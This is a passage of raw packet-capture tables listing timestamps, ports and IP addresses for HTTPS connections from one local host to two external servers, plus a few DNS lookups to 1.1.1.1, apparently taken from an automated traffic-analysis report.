Dec 5, 2024 21:51:51.962402105 CET	443	49935	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.963413954 CET	443	49935	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.963474989 CET	49935	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.964092016 CET	49935	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.964158058 CET	443	49935	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.013776064 CET	49935	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.013807058 CET	443	49935	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.060642958 CET	49935	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.286983013 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.287029982 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.287061930 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.287117004 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.287137985 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.287244081 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.298707008 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.309078932 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.309123039 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.309133053 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.313375950 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.314697981 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.314706087 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.323649883 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.323712111 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.323867083 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.323883057 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.662810087 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.662854910 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.662952900 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.662980080 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.663083076 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.663275957 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.663284063 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.676105022 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.676183939 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.676198959 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.679228067 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.679277897 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.679289103 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.690427065 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.690488100 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.690515041 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.723443031 CET	443	49934	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.723573923 CET	443	49934	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.723660946 CET	49934	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.724479914 CET	49934	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.724495888 CET	443	49934	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.732244968 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.732269049 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.779100895 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.782516003 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.825982094 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.850255966 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.857023001 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.857076883 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.857104063 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.871004105 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.871062994 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.871090889 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.884872913 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.884928942 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.884953022 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.899667978 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.899974108 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.899982929 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.912174940 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.912231922 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.912240028 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.927105904 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.927216053 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.927227974 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.938875914 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.938929081 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.938941002 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.953259945 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.953321934 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.953334093 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.970350027 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.970392942 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.970443010 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.970452070 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.970705032 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.980068922 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.993566990 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:52.993655920 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:52.993666887 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.042565107 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.042649984 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.042680979 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.044847012 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.044903040 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.044926882 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.051276922 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.051341057 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.051367998 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.058358908 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.058423042 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.058445930 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.070878029 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.070951939 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.070979118 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.084081888 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.084141970 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.084167957 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.094994068 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.095072985 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.095092058 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.108560085 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.108616114 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.108644009 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.118232965 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.118355989 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.118372917 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.130049944 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.130111933 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.130137920 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.140757084 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.140826941 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.140856981 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.152482033 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.152544975 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.152719021 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.152743101 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.152790070 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.161931038 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.171665907 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.171696901 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.171772957 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.171803951 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.171987057 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.181190014 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.190670013 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.190697908 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.190757036 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.190790892 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.190864086 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.199800014 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.208491087 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.208532095 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.208542109 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.208554983 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.208594084 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.217422962 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.225985050 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.226064920 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.226073027 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.226089954 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.226124048 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.234426022 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.243014097 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.243046045 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.243160009 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.243199110 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.246113062 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.251729965 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.253515959 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.253647089 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.253714085 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.253726006 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.254647017 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.258750916 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.264000893 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.264081955 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.264089108 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.264097929 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.264138937 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.269229889 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.274451971 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.274507046 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.274514914 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.279767036 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.279792070 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.279817104 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.279825926 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.279879093 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.284873962 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.290184975 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.290242910 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.290294886 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.290318966 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.290448904 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.295281887 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.295659065 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:53.295706034 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.311180115 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:53.311207056 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:55.087861061 CET	49958	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:55.087912083 CET	443	49958	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:55.088021040 CET	49958	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:55.088367939 CET	49958	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:55.088383913 CET	443	49958	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:56.187781096 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:56.187827110 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:56.187887907 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:56.188339949 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:56.188354969 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:56.268328905 CET	49935	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:56.487282991 CET	443	49958	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:56.487401962 CET	49958	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:56.506072044 CET	49958	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:56.506083012 CET	443	49958	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:56.509414911 CET	49958	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:56.509419918 CET	443	49958	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.527369022 CET	443	49958	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.527436018 CET	49958	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.527437925 CET	443	49958	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.527515888 CET	49958	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.528470993 CET	49958	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.528498888 CET	443	49958	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.584296942 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.584362030 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.584825993 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.584836006 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587194920 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587201118 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587260008 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587272882 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587321997 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587326050 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587416887 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587430000 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587435961 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587443113 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587467909 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587480068 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587538004 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587544918 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587563992 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587574959 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587579966 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587584019 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587608099 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587619066 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587632895 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587644100 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587661982 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587678909 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587713003 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587726116 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587749958 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587763071 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587769032 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587774038 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587799072 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587807894 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587847948 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587856054 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587879896 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587891102 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587929010 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587935925 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:57.587941885 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:57.587945938 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:58.203340054 CET	49968	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:58.203375101 CET	443	49968	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:58.203455925 CET	49968	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:58.203958988 CET	49968	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:58.203972101 CET	443	49968	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:59.493844032 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:59.493902922 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:59.493932962 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:59.494046926 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:59.494769096 CET	49962	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:59.494791031 CET	443	49962	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:59.604578018 CET	443	49968	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:59.606107950 CET	49968	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:59.609435081 CET	49968	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:59.609442949 CET	443	49968	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:59.611490011 CET	49968	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:59.611494064 CET	443	49968	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:59.611727953 CET	49968	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:59.611740112 CET	443	49968	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:59.612081051 CET	49968	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:59.612101078 CET	443	49968	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:59.612255096 CET	49968	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:59.612262011 CET	443	49968	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:00.411915064 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:00.411940098 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:00.412019968 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:00.412465096 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:00.412473917 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.072761059 CET	443	49968	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.072820902 CET	443	49968	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.072822094 CET	49968	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.073008060 CET	49968	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.073980093 CET	49968	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.073988914 CET	443	49968	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.411618948 CET	49977	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.411663055 CET	443	49977	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.411835909 CET	49977	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.412111044 CET	49977	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.412123919 CET	443	49977	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.825680017 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.825745106 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.826689959 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.826695919 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.828682899 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.828686953 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.828788042 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.828804970 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.828879118 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.828895092 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.828903913 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.828911066 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.828988075 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.829010963 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.829019070 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.829054117 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.829164982 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.829175949 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.829193115 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.829200983 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.829209089 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.829214096 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:01.829221964 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:01.829246998 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:02.817331076 CET	443	49977	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:02.817431927 CET	49977	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:02.818847895 CET	49977	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:02.818856955 CET	443	49977	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:02.823271990 CET	49977	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:02.823278904 CET	443	49977	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:03.605539083 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:03.605596066 CET	443	49974	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:03.605604887 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:03.605647087 CET	49974	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:52:03.875077009 CET	443	49977	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:03.875138998 CET	443	49977	5.75.212.196	192.168.2.5
Dec 5, 2024 21:52:03.875293016 CET	49977	443	192.168.2.5	5.75.212.196

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 21:50:09.734081030 CET	49550	53	192.168.2.5	1.1.1.1
Dec 5, 2024 21:50:10.552084923 CET	53	49550	1.1.1.1	192.168.2.5
Dec 5, 2024 21:50:20.314286947 CET	55723	53	192.168.2.5	1.1.1.1
Dec 5, 2024 21:50:20.548260927 CET	53	55723	1.1.1.1	192.168.2.5
Dec 5, 2024 21:51:31.802517891 CET	57502	53	192.168.2.5	1.1.1.1
Dec 5, 2024 21:51:31.941312075 CET	53	57502	1.1.1.1	192.168.2.5
Dec 5, 2024 21:51:33.894850016 CET	54182	53	192.168.2.5	1.1.1.1
Dec 5, 2024 21:51:34.216054916 CET	53	54182	1.1.1.1	192.168.2.5
Dec 5, 2024 21:51:49.441804886 CET	53	52597	1.1.1.1	192.168.2.5
Dec 5, 2024 21:51:49.464061975 CET	53	57523	1.1.1.1	192.168.2.5
Dec 5, 2024 21:51:49.585853100 CET	56793	53	192.168.2.5	1.1.1.1
Dec 5, 2024 21:51:49.586035967 CET	53891	53	192.168.2.5	1.1.1.1
